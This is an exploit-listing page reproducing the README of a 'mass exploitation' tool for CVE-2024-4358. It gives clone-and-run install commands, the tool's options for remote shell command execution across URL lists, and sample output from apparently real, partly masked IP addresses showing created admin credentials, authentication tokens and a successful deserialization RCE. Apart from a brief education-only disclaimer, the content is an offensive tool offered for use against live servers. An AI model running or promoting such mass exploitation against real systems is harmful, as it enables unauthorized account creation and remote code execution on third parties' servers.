Share
## https://sploitus.com/exploit?id=02BB892D-B08E-5058-AFF4-A1056D4B0170
# CVE-2024-4358
An Vulnerability detection and Mass Exploitation tool for CVE-2024-4358

### Installation:
```bash
git clone https://github.com/RevoltSecurities/CVE-2024-4358
pip install -r requirements.txt
python3 exploit.py --help
```
### Usage:
```yaml
python3 exploit.py -h                                                                           


    ______     ____  __         _ ______         
   / ____/  __/ __ \/ /  ____  (_)_  __/__  _____
  / __/ | |/_/ /_/ / /  / __ \/ / / / / _ \/ ___/
 / /____>  </ ____/ /__/ /_/ / / / / /  __/ /    
/_____/_/|_/_/   /_____|____/_/ /_/  \___/_/     
  
                    @RevoltSecurities

[Description]: Vulnerability Detection and Exploitation tool for CVE-2024-4358

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     [INF]: Specify a URL or IP wtih port for vulnerability detection
  -l LIST, --list LIST  [INF]: Specify a list of URLs or IPs for vulnerability detection
  -c COMMAND, --command COMMAND
                        [INF]: Specify a shell command to execute it
  -t THREADS, --threads THREADS
                        [INF]: Number of threads for list of URLs
  -proxy PROXY, --proxy PROXY
                        [INF]: Proxy URL to send request via your proxy
  -v, --verbose         [INF]: Increases verbosity of output in console
  -o OUTPUT, --output OUTPUT
                        [INF]: Filename to save output of vulnerable target]

```

### Sample Usage:
```yaml
python3 exploit.py -l urls.txt -c id -t 10                                                      


    ______     ____  __         _ ______         
   / ____/  __/ __ \/ /  ____  (_)_  __/__  _____
  / __/ | |/_/ /_/ / /  / __ \/ / / / / _ \/ ___/
 / /____>  </ ____/ /__/ /_/ / / / / /  __/ /    
/_____/_/|_/_/   /_____|____/_/ /_/  \___/_/     
  
                    @RevoltSecurities

[Vulnerale]: Report for: http://13.42.129.XXX
 Login Crendentials: Usename: ozsebbQpibJbHpghuNLxutxBOl | Password: NvmpjJucmxtqhOtdFtrxfoguvQ | Authentication Token: 7CKVJAPcvFGsfIwxON6KgCy85k8xwDXoKGzV1A3KgUeB-y-DQ_F6k86XjY9KCbSjuHcaog-AJ8AApDtOkGvDw109zvjJUllJESksFmxd8ZK8r1Xdn8u-5sHX-RWmbJBEg5tDSOaQrPPNCds7RyzhEGcTiVbG0gDUfiIFgmwNWa1i8VOhhTgASDARnfPXfOfqsWqv23SrLXteuEXNymjDrC-GXWvhRHZ8a_vWhfJBSBB7aBZmXux1iq07InnAPwYC2Y12TrEG6MUPPCBHSW-vlld850MBuCktR7vjLdzahJAAdERMbAudSnetHBY4AN-221F6iIY2GjjenRiNCnJOt8gfK3I5b57d6QFy3i3a4GxnM-5AUfTGrbHrHrxP5hzpfz5bhG-xulDTyOK-g6UJJQOQBIWHIUA-QOzOufSNovv0gBnhilYBTY9ITDJSOOWSdxDVmr4U4re8xI_3InkeK8IRkIzMmTxrrnQi_J8or0hqP-7yMPCJR5gIQrOMUXPtatpVqZikho8aR3aWCcAHmoJr5yU
 Deserialization RCE: Failed
[Vulnerale]: Report for: http://52.2.58.XX
 Login Crendentials: Usename: pjzgrOrjJXqQyFoubmrcSkHZHC | Password: ZrGVXZqIrgWkuHCgUlkHIeYPG | Authentication Token: S6q_Le5LoTqew1AmblOvZfBU5R7U0BEcBJ84UvvBf2HnUzJ_wCtstEYHqhxgEBSj7uWQ7iCCoW-_I5Z7XXpkolAN831q_NWsarTsqbm98XKP5CToJ_7lrS_1SbWCd6TJbdrBYHoSCEnRF0DMbhPzdY4TGv9P7gJQHf37jPm2lkDfC6kLyBXFopZklIwv6WrvmFw04vzLDKCWpgLP88GGqRKPJPnMNNarIUu9Mn_fV2WOei4LFWJMnmHTyLPAhK7eMLmjGmwr6jgRQp7C7PhNIpugRvUkyS8381ddVcXV8LJv2OR2yA2e2efE-Oc0
 Deserialization RCE: Failed
[Vulnerale]: Report for: http://194.233.XXX.235:83
 Login Crendentials: Usename: YmWwYloORUtOUPGuVDCbxZmuEKoIPL | Password: EPuvJTzroIfncpAHHGjJYXAKaPhQMW | Authentication Token: Ja42x9_DsL88xoSpm9xJoVIyeYEesbK2p-tZnOP-yvuiiF_DYNA6vNBeIwe8y2OcUJuOcCPtR_ODGynVtgCMmtpZxb_KRusasjNrlM2cNPKP4omDYacvcejGPycPmmd_A4Qi0ohEPG3Y4JfaU7Le3DJlMSTEoneCqcrXRqNS2JbTIXzOSXM3dSMz_0AwgHVN4H35HCkcAbedA5c-OLv_d6n9evsyHiHm15FuqbWzzqq-nTcXRiUtSYXEspCyiXE22ZlRdzClA6WDKC0-b1kFWj4Jb1yr3WULzmYHespHoRnXti_1gJoRs6Qbv2
 Report created: ELHaimYtblAxViEKIXxpdFyOXNlEHb
 Deserialization RCE: Success
Exploiter |โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ| 3/3 [100%] in 7.5s (0.34/s) 
```

### INFO:
The tool is Developed by [D.Sanjai Kumar @RevoltSecurities](https://www.linkedin.com/in/d-sanjai-kumar-109a7227b/) to detect and  mass exploit the Vulnerability CVE-2024-4358, 
The tool is only for education and ethical purpose only and Developers are not responsible for any illegal exploitations.